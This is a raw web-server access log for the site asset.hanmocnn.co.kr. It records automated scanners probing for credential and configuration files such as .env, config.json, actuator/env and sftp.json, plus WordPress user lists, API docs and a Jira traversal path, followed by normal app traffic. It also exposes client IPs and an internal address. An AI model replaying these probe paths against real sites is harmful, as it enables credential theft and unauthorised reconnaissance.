147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:45 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/config.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:45 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/gql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:45 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:46 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/config.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:47 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-" -[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/info.php" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 34.123.170.104] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/telescope/requests" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/info.php" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 34.72.176.129] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:00:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:49 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:50 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/actuator/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:52 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:52 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:53 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:53 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-" -[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:54 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:55 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:55 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:56 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:56 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:57 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:57 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:58 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v3/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:59 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:00:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v3/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:00 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:00 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:01 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/@vite/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:01 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:02 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:02 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/@vite/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:03 +0000] - 502 502 - OPTIONS https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:03 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:04 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:04 +0000] - - 301 - OPTIONS http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:05 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:05 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:06 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:02:40 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:23:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 91.231.89.18] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:26:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.231.89.19] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:30:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.196.152.61] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:30:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.61] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:36:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 63607] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[14/Feb/2026:23:37:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:00:01:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.138.118.91] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" -[15/Feb/2026:00:05:48 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:00:18:07 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" 